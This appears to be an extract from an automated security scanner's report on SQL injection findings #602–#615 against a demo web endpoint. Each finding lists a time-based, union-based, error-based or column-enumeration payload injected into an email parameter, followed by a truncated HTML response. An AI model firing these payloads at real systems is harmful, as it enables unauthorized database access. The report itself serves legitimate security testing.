href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #602\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #603\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #604\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io \") or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #605\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #606\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #607\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"\"*\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #608\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #609Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A\n')),4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #610\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #611\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ')) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #612\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #613\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #614\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"\" \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #615\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io \");waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 